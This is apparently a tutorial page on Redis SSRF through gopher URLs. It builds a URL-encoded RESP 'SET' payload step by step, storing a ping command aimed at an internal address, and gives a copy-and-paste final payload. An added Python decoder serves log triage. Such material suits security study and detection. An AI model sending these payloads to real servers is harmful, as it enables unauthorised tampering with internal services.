# Redis SSRF

### Investigation

If the target server runs Redis and the website interacts with it, we can modify a key's value in Redis and have the result reflected through SSRF using the **gopher** protocol.

```shellscript
url=http://evil.com/
```

### Exploitation

#### Automation

We can use [Gopherus](https://github.com/tarunkant/Gopherus) to create a payload.

#### Payload Manually

To build the SSRF payload manually, we need to know which commands to insert.\
To make this clear, the following demonstrates the command (in RESP format) that updates the target key's value in Redis. See the [Redis commands](https://exploit-notes.hdks.org/exploit/database/redis/) for details.

Below is an example command equivalent to **`SET user ...`**.

```shellscript
telnet 10.0.0.1 6379
*3 # 3 arguments: "SET", "user", and the value
$3 # length of the string "SET"
SET
$4 # length of the key string "user"
user
$18 # length of the value string
ping+-c+1+10.0.0.2
```

Next, we need to format the above command as a gopher URL. It needs to be URL-encoded, including the **`%0D%0A` (`\r\n`)** line terminators.

```shellscript
gopher://10.0.0.1:6379/_%0D
%0D%0A # \r\n
%2A3 # *3
%0D%0A # \r\n
%243 # $3
%0D%0A # \r\n
SET
%0D%0A # \r\n
%244 # $4
%0D%0A # \r\n
user
%0D%0A # \r\n
%2418 # $18
%0D%0A
ping%2B%2Dc%2B1%2B10%2E0%2E0%2E2 # ping+-c+1+10.0.0.2
%0D%0A
```

Finally we get the payload.

```
gopher://10.0.0.1:6379/_%250D%0A%250D%250A%0A%252A3%0A%250D%250A%0A%25243%0A%250D%250A%0ASET%0A%250D%250A%0A%25244%0A%250D%250A%0Auser%0A%250D%250A%0A%252418%0A%250D%250A%0Aping+-c+1+10.0.0.2%0A%250D%250A
```

Copy it and paste it where the payload affects the result.
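
Going the other way helps when triaging logs: the following added example (not from the original page or from Gopherus) decodes a logged `gopher://` URL and recovers the Redis command it carries, using the payload above as input. The function names and the three-round decoding limit are assumptions made for this example.

```python
import re
from urllib.parse import unquote

# Final payload copied from this page (double-encoded, with stray %0A).
PAGE_PAYLOAD = (
    "gopher://10.0.0.1:6379/_%250D%0A%250D%250A%0A%252A3%0A%250D%250A%0A"
    "%25243%0A%250D%250A%0ASET%0A%250D%250A%0A%25244%0A%250D%250A%0Auser"
    "%0A%250D%250A%0A%252418%0A%250D%250A%0Aping+-c+1+10.0.0.2%0A%250D%250A"
)

GOPHER_RE = re.compile(r"gopher://([^/\s]+)/(\S*)", re.I)

def fully_unquote(text, max_rounds=3):
    """Percent-decode until stable; SSRF payloads are often encoded twice."""
    for _ in range(max_rounds):
        decoded = unquote(text)
        if decoded == text:
            break
        text = decoded
    return text

def extract_redis_commands(url):
    """Return (target, commands) recovered from a gopher:// URL, else None."""
    match = GOPHER_RE.fullmatch(url.strip())
    if not match:
        return None
    # The first character after "/" is the gopher item type ("_" here).
    target, payload = match.group(1), fully_unquote(match.group(2)[1:])
    # Tolerant RESP walk: split on any CR/LF run and drop empty lines.
    tokens = [t for t in re.split(r"[\r\n]+", payload) if t.strip()]
    commands, current, expect_arg = [], None, False
    for tok in tokens:
        if re.fullmatch(r"\*\d+", tok):       # "*N": a new command begins
            current = []
            commands.append(current)
        elif re.fullmatch(r"\$\d+", tok):     # "$N": next token is an argument
            expect_arg = True
        elif expect_arg and current is not None:
            current.append(tok)
            expect_arg = False
        else:                                  # inline (non-RESP) command
            commands.append(tok.split())
    return target, commands

if __name__ == "__main__":
    print(extract_redis_commands(PAGE_PAYLOAD))
```

Any `gopher://` value reaching a URL-fetching parameter is worth an alert on its own; the decoded command shows which key the request tried to change.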

